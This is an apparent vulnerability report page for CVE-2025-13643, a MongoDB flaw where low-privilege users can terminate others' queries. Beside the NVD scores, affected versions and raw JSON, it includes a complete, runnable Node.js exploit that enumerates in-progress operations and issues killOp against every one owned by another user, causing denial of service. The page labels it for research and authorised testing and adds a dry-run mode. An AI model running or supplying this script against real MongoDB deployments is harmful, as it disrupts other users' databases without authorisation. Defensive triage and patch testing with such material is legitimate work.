Security Vulnerability Report
CVE-2025-13643 — CVSS 3.1 LOW (Secondary rating; the Primary rating recorded in the NVD data below is 6.5 MEDIUM — see CVSS Details)

CVE-2025-13643

Published: 2025-11-25 06:15:46
Last Modified: 2025-12-11 23:20:37

Description

A user with access to the cluster with a limited set of privilege actions may be able to terminate queries that are being executed by other users. This may cause a denial of service by preventing a fraction of queries from successfully completing. This issue affects MongoDB Server v7.0 versions prior to 7.0.26 and MongoDB Server v8.0 versions prior to 8.0.14

CVSS Details

CVSS Score
3.1 (Secondary rating, CVSS v3.1). The Primary rating in the NVD record is 6.5 MEDIUM; the two differ on Attack Complexity (H vs L) and Availability impact (L vs H), so triage against the higher one unless you have evidence the attack is hard to mount in your deployment.
Severity
LOW (Secondary) / MEDIUM (Primary)
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L (Secondary, 3.1 LOW)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H (Primary, 6.5 MEDIUM)
CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N (Secondary, 2.3 LOW)
Weakness
CWE-862 (Missing Authorization)

Configurations (Affected Products)

cpe:2.3:a:mongodb:mongodb:*:*:*:*:-:*:*:* - VULNERABLE (7.0.0 ≤ version < 7.0.26)
cpe:2.3:a:mongodb:mongodb:*:*:*:*:-:*:*:* - VULNERABLE (8.0.0 ≤ version < 8.0.14)
cpe:2.3:a:mongodb:mongodb:8.2.0:alpha:*:*:-:*:*:* - VULNERABLE
cpe:2.3:a:mongodb:mongodb:8.2.0:alpha0:*:*:-:*:*:* - VULNERABLE
cpe:2.3:a:mongodb:mongodb:8.2.0:alpha1:*:*:-:*:*:* - VULNERABLE
cpe:2.3:a:mongodb:mongodb:8.2.0:alpha2:*:*:-:*:*:* - VULNERABLE
(The 8.2.0 pre-release builds are flagged vulnerable, but this record names no fixed 8.2 version; check the vendor advisory before relying on an 8.2 build.)
MongoDB Server v7.0 < 7.0.26
MongoDB Server v8.0 < 8.0.14

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. It issues killOp against every in-progress operation it can see that is not its own, so run it only against a test deployment you control — never a shared or production cluster.
javascript (Node.js, `mongodb` driver — the listing below is not Python)
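// CVE-2025-13643 PoC - MongoDB Query Termination Vulnerability
// Requires a low-privilege user with cluster access.
//
// Connects with the supplied low-privilege account, lists in-progress
// operations via the currentOp command, and issues killOp for every
// operation that is not owned by that account. On a patched server
// (7.0.26+ / 8.0.14+) the killOp calls are expected to be refused with
// Unauthorized (server error code 13); that outcome is reported rather
// than treated as a crash.
//
// Configuration (environment variables; defaults are the original
// hard-coded values):
//   MONGODB_URI  target connection string  (default mongodb://target-server:27017)
//   MONGO_USER   low-privilege user name   (default limited_user)
//   MONGO_PASS   low-privilege password    (default low_privilege_pass)
//   DRY_RUN      set to "1" to list the operations that would be killed
//                without sending any killOp
const { MongoClient } = require('mongodb');

const targetHost = process.env.MONGODB_URI || 'mongodb://target-server:27017';
const attackerCredentials = {
  user: process.env.MONGO_USER || 'limited_user',
  password: process.env.MONGO_PASS || 'low_privilege_pass',
};
const dryRun = process.env.DRY_RUN === '1';

// Server error code returned when the caller lacks the privilege action.
const UNAUTHORIZED = 13;

/**
 * Names of the users an in-progress operation runs as.
 * currentOp reports them under `effectiveUsers` ([{ user, db }]); there is
 * no `usr` field, so the original `op.usr !== user` test was always true and
 * would have targeted the attacker's own operations too.
 * @param {object} op - one entry of currentOp's `inprog` array
 * @returns {string[]} user names (empty when the server reports none)
 */
function operationUsers(op) {
  const users = Array.isArray(op.effectiveUsers) ? op.effectiveUsers : [];
  return users
    .filter((u) => u && typeof u.user === 'string')
    .map((u) => u.user);
}

/**
 * Attempts to terminate every in-progress operation owned by another user.
 * Each killOp is attempted independently: an Unauthorized refusal is counted
 * and the loop continues, so one protected operation does not abort the run.
 * Any other error (connection failure, unexpected server error) is logged and
 * rethrown.
 * @returns {Promise<{attempted: number, killed: number, denied: number}>}
 *   counts of operations targeted, successfully killed, and refused
 * @throws {Error} on connection failure or a non-Unauthorized server error
 */
async function exploitCVE202513643() {
  const client = new MongoClient(targetHost, {
    // NOTE(review): mongodb driver 4.x+ expects `auth.username`; `auth.user`
    // is the 3.x form. Confirm against the installed driver version.
    auth: attackerCredentials,
    authSource: 'admin',
  });
  const summary = { attempted: 0, killed: 0, denied: 0 };
  try {
    await client.connect();
    const adminDb = client.db('admin');

    // Step 1: Identify active queries from other users.
    // Db.command() runs the command against the admin database; adminCommand
    // is a mongosh shell helper, not a Node driver method.
    const activeOperations = await adminDb.command({ currentOp: 1, $all: false });
    const inprog = Array.isArray(activeOperations.inprog) ? activeOperations.inprog : [];
    console.log('Active operations found:', inprog.length);

    // Step 2: Terminate queries from other users
    for (const op of inprog) {
      // opid may be a number (mongod) or a "shard:opid" string (mongos); only
      // its absence disqualifies the entry.
      if (op.opid === undefined || op.opid === null) continue;
      const owners = operationUsers(op);
      if (owners.includes(attackerCredentials.user)) continue;

      const ownerLabel = owners.length > 0 ? owners.join(',') : '<unknown>';
      summary.attempted += 1;
      if (dryRun) {
        console.log(`[dry-run] would terminate operation ${op.opid} from user ${ownerLabel}`);
        continue;
      }
      console.log(`Terminating operation ${op.opid} from user ${ownerLabel}`);
      try {
        await adminDb.command({ killOp: 1, op: op.opid });
        summary.killed += 1;
        console.log(`Successfully terminated query: ${op.opid}`);
      } catch (error) {
        if (error.code === UNAUTHORIZED) {
          // Expected on a patched server or when the account lacks killop.
          summary.denied += 1;
          console.log(`killOp refused for ${op.opid} (Unauthorized) - target may be patched`);
          continue;
        }
        throw error;
      }
    }
    console.log('CVE-2025-13643 exploitation completed', summary);
    return summary;
  } catch (error) {
    console.error('Exploitation failed:', error.message);
    throw error;
  } finally {
    await client.close();
  }
}

exploitCVE202513643().catch(() => {
  // Already logged above; surface the failure through the exit status.
  process.exitCode = 1;
});

// Defense: Upgrade to MongoDB Server v7.0.26+ or v8.0.14+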

References

https://jira.mongodb.org/browse/SERVER-103582 — vendor advisory (MongoDB JIRA SERVER-103582), the only reference listed in the record below

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13643", "sourceIdentifier": "[email protected]", "published": "2025-11-25T06:15:45.580", "lastModified": "2025-12-11T23:20:36.673", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A user with access to the cluster with a limited set of privilege actions may be able to terminate queries that are being executed by other users. This may cause a denial of service by preventing a fraction of queries from successfully completing. This issue affects MongoDB Server v7.0 versions prior to 7.0.26 and MongoDB Server v8.0 versions prior to 8.0.14"}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.3, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", 
"Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 3.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.6, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mongodb:mongodb:*:*:*:*:-:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.0.26", "matchCriteriaId": "8788DEE3-96FD-4F62-BE22-EB3F9C4DD73F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mongodb:mongodb:*:*:*:*:-:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.0.14", "matchCriteriaId": "DB40CA6D-51A5-4D61-979F-E71C50C96B65"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mongodb:mongodb:8.2.0:alpha:*:*:-:*:*:*", "matchCriteriaId": "5BF4D317-BC85-4BA9-9D64-91F14C4398F2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mongodb:mongodb:8.2.0:alpha0:*:*:-:*:*:*", "matchCriteriaId": 
"64806572-E654-4691-90A6-C978BAD30263"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mongodb:mongodb:8.2.0:alpha1:*:*:-:*:*:*", "matchCriteriaId": "870C35A8-B7C5-4CC0-A8D6-D39DE370EEA9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mongodb:mongodb:8.2.0:alpha2:*:*:-:*:*:*", "matchCriteriaId": "FCFCFC59-331F-47E1-9EA4-A0CA3D9F7989"}]}]}], "references": [{"url": "https://jira.mongodb.org/browse/SERVER-103582", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}